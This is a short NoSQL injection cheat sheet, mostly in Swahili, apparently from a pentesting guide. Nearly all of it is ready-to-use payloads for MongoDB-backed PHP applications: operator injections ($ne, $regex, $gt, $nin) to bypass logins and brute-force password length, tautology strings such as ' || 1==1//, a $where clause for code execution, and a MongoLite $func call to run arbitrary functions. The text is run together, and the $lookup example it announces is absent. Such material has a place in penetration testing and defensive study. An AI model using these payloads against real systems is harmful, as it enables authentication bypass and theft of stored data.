Katika PHP unaweza kutuma Array kwa kubadilisha parameter iliyotumwa kutoka parameter=foo hadi parameter[arrName]=foo.
Mbinu za kudukua zinategemea kuongeza Msimamizi:
username[$ne]=1$password[$ne]=1#<Not Equals>username[$regex]=^adm$password[$ne]=1#Check a <regular expression>, could be used to brute-force a parameterusername[$regex]=.{25}&pass[$ne]=1#Use the <regex> to find the length of a valueusername[$eq]=admin&password[$ne]=1#<Equals>username[$ne]=admin&pass[$lt]=s#<Less than>, Brute-force pass[$lt] to find more usersusername[$ne]=admin&pass[$gt]=s#<Greater Than>username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits"}#<IF>,canbeusedtoexecutecode
An attacker can exploit this by inputting strings like admin' || 'a'=='a, making the query return all documents by satisfying the condition with a tautology ('a'=='a'). This is analogous to SQL injection attacks where inputs like ' or 1=1-- - are used to manipulate SQL queries. In MongoDB, similar injections can be done using inputs like ' || 1==1//, ' || 1==1%00, or admin' || 'a'=='a.
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
Chukua habari ya urefu
username[$ne]=toto&password[$regex]=.{1}username[$ne]=toto&password[$regex]=.{3}# True if the length equals 1,3...
Kwa kutumia operator $func wa maktaba ya MongoLite (inayotumiwa kwa chaguo-msingi) inaweza kuwa inawezekana kutekeleza kazi ya kiholela kama ilivyo katika ripoti hii.
"user":{"$func":"var_dump"}
Pata habari kutoka kwa mkusanyiko tofauti
Inawezekana kutumia $lookup kupata habari kutoka kwa mkusanyiko tofauti. Katika mfano ufuatao, tunasoma kutoka kwa mkusanyiko tofauti uitwao users na kupata matokeo ya kila kuingia yenye nenosiri linalolingana na wildcard.
TAARIFA:$lookup na kazi nyingine za uagizaji zinapatikana tu ikiwa kazi ya aggregate() ilitumika kufanya utafutaji badala ya kazi za kawaida za find() au findOne().